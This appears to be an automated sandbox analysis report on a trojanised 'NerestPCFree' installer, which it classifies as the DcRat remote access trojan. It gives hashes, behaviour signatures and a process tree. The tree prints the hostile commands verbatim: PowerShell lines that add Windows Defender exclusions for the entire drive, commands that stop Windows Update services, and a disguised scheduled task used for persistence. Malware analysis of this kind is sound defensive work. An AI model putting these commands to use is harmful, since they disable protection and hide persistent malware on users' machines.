Analysis

  • max time kernel
    40s
  • max time network
    88s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-12-2024 16:58

General

  • Target

    NerestPC free/NerestPCFree 0.31.1.exe

  • Size

    7.0MB

  • MD5

    9d0a77bd28d67eab798c50f0c6a24b64

  • SHA1

    2de59eddd73ab784cc8f791cd96d7f81741ccae3

  • SHA256

    a35479bc985fe56167b824f5d0d9ff96598af672afe8785bc9f87815c11393dc

  • SHA512

    25ca283707b61c8149615f7e7958edb886378702ecbcf079191698d686b4a7a39d1be655e44ccf2752e569481e9eb25f3a10e59322c0c97c7e858fb5f9eabb17

  • SSDEEP

    196608:i46iIYMaKuKGfjtVlQqtolrkiBJk3b8pA2uW3c:i7YpBDtVlmlgyJ0r

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Modifies WinLogon for persistence 2 TTPs 6 IoCs
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 12 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Power Settings 1 TTPs 10 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 19 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 5 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 20 IoCs
  • Suspicious use of SendNotifyMessage 40 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:596
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:64
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:672
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
        1⤵
          PID:952
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
          1⤵
            PID:448
          • C:\Windows\System32\svchost.exe
            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
            1⤵
              PID:1028
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1044
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                1⤵
                  PID:1052
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                  1⤵
                  • Drops file in System32 directory
                  PID:1184
                  • C:\Windows\system32\taskhostw.exe
                    taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                    2⤵
                      PID:3008
                    • C:\Program Files\Google\Chrome\updater.exe
                      "C:\Program Files\Google\Chrome\updater.exe"
                      2⤵
                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      • Drops file in Program Files directory
                      PID:3552
                  • C:\Windows\System32\svchost.exe
                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                    1⤵
                      PID:1196
                    • C:\Windows\system32\svchost.exe
                      C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                      1⤵
                        PID:1320
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                        1⤵
                          PID:1328
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1396
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                            1⤵
                              PID:1404
                            • C:\Windows\System32\svchost.exe
                              C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                              1⤵
                                PID:1412
                              • C:\Windows\system32\svchost.exe
                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                1⤵
                                  PID:1504
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                  1⤵
                                    PID:1544
                                    • C:\Windows\system32\sihost.exe
                                      sihost.exe
                                      2⤵
                                        PID:2892
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                      1⤵
                                        PID:1596
                                      • C:\Windows\System32\svchost.exe
                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                        1⤵
                                          PID:1672
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1720
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                            1⤵
                                              PID:1780
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1832
                                              • C:\Windows\system32\svchost.exe
                                                C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                1⤵
                                                  PID:1896
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1904
                                                  • C:\Windows\System32\svchost.exe
                                                    C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                    1⤵
                                                      PID:1924
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                      1⤵
                                                        PID:1976
                                                      • C:\Windows\System32\spoolsv.exe
                                                        C:\Windows\System32\spoolsv.exe
                                                        1⤵
                                                          PID:1004
                                                        • C:\Windows\System32\svchost.exe
                                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                          1⤵
                                                            PID:1804
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                            1⤵
                                                              PID:2184
                                                            • C:\Windows\system32\svchost.exe
                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                              1⤵
                                                                PID:2364
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                1⤵
                                                                  PID:2372
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                  1⤵
                                                                    PID:2424
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2484
                                                                    • C:\Windows\system32\svchost.exe
                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                      1⤵
                                                                        PID:2508
                                                                      • C:\Windows\System32\svchost.exe
                                                                        C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                        1⤵
                                                                          PID:2532
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                                          1⤵
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:2540
                                                                        • C:\Windows\system32\svchost.exe
                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                          1⤵
                                                                            PID:2556
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:2924
                                                                            • C:\Windows\system32\wbem\unsecapp.exe
                                                                              C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                              1⤵
                                                                                PID:2840
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                                1⤵
                                                                                  PID:2956
                                                                                • C:\Windows\system32\svchost.exe
                                                                                  C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                  1⤵
                                                                                    PID:3356
                                                                                  • C:\Windows\Explorer.EXE
                                                                                    C:\Windows\Explorer.EXE
                                                                                    1⤵
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: GetForegroundWindowSpam
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    PID:3364
                                                                                    • C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\NerestPC free\NerestPCFree 0.31.1.exe"
                                                                                      2⤵
                                                                                      • Checks computer location settings
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:4764
                                                                                      • C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\MpDefenderCoreService.exe"
                                                                                        3⤵
                                                                                        • Checks computer location settings
                                                                                        • Executes dropped EXE
                                                                                        • System Location Discovery: System Language Discovery
                                                                                        • Modifies registry class
                                                                                        • Suspicious use of WriteProcessMemory
                                                                                        PID:2660
                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                          "C:\Windows\System32\WScript.exe" "C:\fontwin\rjeG9jpaqkoGYbXQiCixJVHPtViWeFHmB5.vbe"
                                                                                          4⤵
                                                                                          • Checks computer location settings
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:992
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c ""C:\fontwin\SCfgtLybPKjlpPh39WWFnP7oUkboktfnsRDnMjyFOdFfzldEyFoe.bat" "
                                                                                            5⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:1648
                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                              6⤵
                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                              PID:1984
                                                                                            • C:\fontwin\MsServerHost.exe
                                                                                              "C:\fontwin/MsServerHost.exe"
                                                                                              6⤵
                                                                                              • Modifies WinLogon for persistence
                                                                                              • Checks computer location settings
                                                                                              • Executes dropped EXE
                                                                                              • Adds Run key to start application
                                                                                              • Drops file in Program Files directory
                                                                                              • Drops file in Windows directory
                                                                                              • Modifies registry class
                                                                                              PID:1660
                                                                                              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lsdwy4t1\lsdwy4t1.cmdline"
                                                                                                7⤵
                                                                                                • Drops file in System32 directory
                                                                                                PID:2468
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  8⤵
                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                  PID:4788
                                                                                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFC3.tmp" "c:\Windows\System32\CSC32FC33ECE203443ABA9072655949BF63.TMP"
                                                                                                  8⤵
                                                                                                    PID:5000
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                                                                                  7⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  PID:1360
                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    8⤵
                                                                                                      PID:1012
                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                                                                                    7⤵
                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                    PID:4072
                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      8⤵
                                                                                                        PID:4736
                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                                                                                      7⤵
                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                      PID:3076
                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                        8⤵
                                                                                                          PID:3052
                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/fontwin/'
                                                                                                        7⤵
                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                        PID:1992
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          8⤵
                                                                                                            PID:688
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                                                                                          7⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:3992
                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                            8⤵
                                                                                                              PID:1036
                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                                                                                            7⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            PID:1876
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              8⤵
                                                                                                                PID:2788
                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                                                                                                              7⤵
                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                              PID:4988
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                8⤵
                                                                                                                  PID:3040
                                                                                                                • C:\Windows\system32\wermgr.exe
                                                                                                                  "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4988" "2128" "2084" "2132" "0" "0" "2136" "0" "0" "0" "0" "0"
                                                                                                                  8⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Enumerates system info in registry
                                                                                                                  PID:5776
                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                                                                                                                7⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                PID:3284
                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  8⤵
                                                                                                                    PID:2192
                                                                                                                  • C:\Windows\system32\wermgr.exe
                                                                                                                    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3284" "2196" "2112" "2200" "0" "0" "2204" "0" "0" "0" "0" "0"
                                                                                                                    8⤵
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:5828
                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                                                                                                                  7⤵
                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                  PID:2496
                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                    8⤵
                                                                                                                      PID:2604
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                                                                                                                    7⤵
                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                    PID:224
                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                      8⤵
                                                                                                                        PID:3488
                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                                                                                                                      7⤵
                                                                                                                      • Command and Scripting Interpreter: PowerShell
                                                                                                                      PID:660
                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                        8⤵
                                                                                                                          PID:696
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                                                                                                                        7⤵
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        PID:1124
                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          8⤵
                                                                                                                            PID:4332
                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\Cookies\unsecapp.exe'
                                                                                                                          7⤵
                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                          PID:2964
                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            8⤵
                                                                                                                              PID:4748
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Containers\serviced\WmiPrvSE.exe'
                                                                                                                            7⤵
                                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                                            PID:4476
                                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              8⤵
                                                                                                                                PID:532
                                                                                                                              • C:\Windows\system32\wermgr.exe
                                                                                                                                "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4476" "2172" "2096" "2176" "0" "0" "2180" "0" "0" "0" "0" "0"
                                                                                                                                8⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:5588
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Java\Registry.exe'
                                                                                                                              7⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              PID:4664
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                8⤵
                                                                                                                                  PID:1860
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\services.exe'
                                                                                                                                7⤵
                                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                                PID:3828
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  8⤵
                                                                                                                                    PID:4588
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Downloaded Program Files\RuntimeBroker.exe'
                                                                                                                                  7⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  PID:4208
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    8⤵
                                                                                                                                      PID:856
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    "powershell" -Command Add-MpPreference -ExclusionPath 'C:\fontwin\MsServerHost.exe'
                                                                                                                                    7⤵
                                                                                                                                    • Command and Scripting Interpreter: PowerShell
                                                                                                                                    PID:4420
                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                      8⤵
                                                                                                                                        PID:1344
                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1jNuw3RpYi.bat"
                                                                                                                                      7⤵
                                                                                                                                        PID:3896
                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                          8⤵
                                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                                          PID:1132
                                                                                                                                        • C:\Windows\system32\chcp.com
                                                                                                                                          chcp 65001
                                                                                                                                          8⤵
                                                                                                                                            PID:6032
                                                                                                                                          • C:\Windows\system32\PING.EXE
                                                                                                                                            ping -n 10 localhost
                                                                                                                                            8⤵
                                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                                            • Runs ping.exe
                                                                                                                                            PID:624
                                                                                                                                          • C:\Recovery\WindowsRE\services.exe
                                                                                                                                            "C:\Recovery\WindowsRE\services.exe"
                                                                                                                                            8⤵
                                                                                                                                              PID:5828
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\twain32.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\twain32.exe"
                                                                                                                                    3⤵
                                                                                                                                    • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:4052
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                                                                  2⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4036
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:1036
                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                    sc stop UsoSvc
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:3452
                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                    sc stop WaaSMedicSvc
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:3408
                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                    sc stop wuauserv
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4388
                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                    sc stop bits
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:212
                                                                                                                                  • C:\Windows\System32\sc.exe
                                                                                                                                    sc stop dosvc
                                                                                                                                    3⤵
                                                                                                                                    • Launches sc.exe
                                                                                                                                    PID:4760
                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                                                  2⤵
                                                                                                                                  • Power Settings
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:2756
                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                    powercfg /x -hibernate-timeout-ac 0
                                                                                                                                    3⤵
                                                                                                                                    • Power Settings
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1704
                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                    powercfg /x -hibernate-timeout-dc 0
                                                                                                                                    3⤵
                                                                                                                                    • Power Settings
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:816
                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                    powercfg /x -standby-timeout-ac 0
                                                                                                                                    3⤵
                                                                                                                                    • Power Settings
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:2264
                                                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                                                    powercfg /x -standby-timeout-dc 0
                                                                                                                                    3⤵
                                                                                                                                    • Power Settings
                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                    PID:1532
                                                                                                                                • C:\Windows\System32\dialer.exe
                                                                                                                                  C:\Windows\System32\dialer.exe
                                                                                                                                  2⤵
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:1228
                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#xzibzypo#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                                                                                                                                  2⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:4284
                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    3⤵
                                                                                                                                      PID:3380
                                                                                                                                  • C:\Windows\System32\schtasks.exe
                                                                                                                                    C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
                                                                                                                                    2⤵
                                                                                                                                      PID:384
                                                                                                                                      • C:\Windows\System32\Conhost.exe
                                                                                                                                        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
